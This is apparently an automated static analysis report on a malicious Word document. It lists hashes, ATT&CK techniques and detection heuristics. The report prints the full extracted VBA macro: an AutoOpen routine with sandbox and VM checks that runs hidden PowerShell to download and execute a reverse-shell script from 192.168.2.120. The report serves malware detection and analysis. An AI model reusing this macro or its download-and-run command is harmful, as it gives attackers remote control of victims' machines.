Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d18bcf7b737b08fb…

MALICIOUS

Office (OOXML)

22.5 KB Created: 2021-05-27 11:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-04
MD5: b19a31667c445833e9ea86e77fd01a53 SHA-1: f13f63475a171602333dde42b674c0929b136768 SHA-256: d18bcf7b737b08fbff1e002f94ba78e339e395b8a150e4dd3372d5d949464faa
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1140 Deobfuscate/Decode Files or Information T1027 Obfuscated Files or Information

The sample contains VBA macros that execute a shell command, likely to download and run a second-stage payload. The script attempts to detect and evade analysis environments like Sandboxie, VMWare, and VirtualBox. The obfuscated shell command, which includes a URL, is a strong indicator of malicious intent.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.2.120/reverse_shell_120_4444.ps1 Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4631 bytes
SHA-256: e83ff73f2c019761d4a305d087222dbf3fb0d896a0deee401825fbd9fcbebb8f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Public Declare PtrSafe Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)
Public Const MOUSEEVENTF_LEFTDOWN = &H2
Public Const MOUSEEVENTF_LEFTUP = &H4
Public Const MOUSEEVENTF_RIGHTDOWN As Long = &H8
Public Const MOUSEEVENTF_RIGHTUP As Long = &H10
'Declare sleep
Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
 
Sub AutoOpen()


If IsSandBoxiePresent(1) = True Then MsgBox ("OH no Sandboxie is here ...")
If IsvirtualboxPresent(1) = True Then MsgBox ("OH no Virtualbox is here ...")
If IsvmwarePresent(1) = True Then MsgBox ("OH no VMWare is here ...")
'If IsSandBoxiePresent(1) = True Then Call SomeSub
'If IsvirtualboxPresent(1) = True Then Call SomeSub
'If IsvmwarePresent(1) = True Then Call SomeSub
'If IsSandBoxiePresent(1) = True Then Call LeftClick
'If IsvmwarePresent(1) = True Then Call LeftClick
'If IsvirtualboxPresent(1) = True Then Call LeftClick
'If IsSandBoxiePresent(1) = True Then Call RigthClick
'If IsvmwarePresent(1) = True Then Call RightClick
'If IsvirtualboxPresent(1) = True Then Call RightClick
If IsSandBoxiePresent(1) = True Then Call Shello
If IsvmwarePresent(1) = True Then Call Shello
If IsvirtualboxPresent(1) = True Then Call Shello

End Sub

Sub msg()
 MsgBox ("Your are in VM ...")
End Sub
 
 Function IsvirtualboxPresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("vmcheck.dll")
           If hSbie <> 0 Then
               IsvirtualboxPresent = True
           Else
               IsvirtualboxPresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsvirtualboxPresent = True
           Else
               IsvirtualboxPresent = False
           End If
   End Select
End Function
 
 
 
 
 
 Function IsvmwarePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("dbghelp.dll")
           If hSbie <> 0 Then
               IsvmwarePresent = True
           Else
               IsvmwarePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsvmwarePresent = True
           Else
               IsvmwarePresent = False
           End If
   End Select
End Function
 
 
 
 
Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("SbieDll.dll")
           If hSbie <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
   End Select
End Function

Private Sub LeftClick()
  mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
End Sub
Private Sub RightClick()
  mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
End Sub


Sub Shello()

  mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
  mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"

End Sub
Sub SomeSub()
    End
    'Code will not execute
    Debug.Print "SomeSub: Hello after Exit Sub!"
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 29696 bytes
SHA-256: f7eddfcf68ee0848114039bc49f5414239885c3be7c4ed463e7fffbca5d8762f

Open this report in the interactive analyzer, or submit your own file for analysis.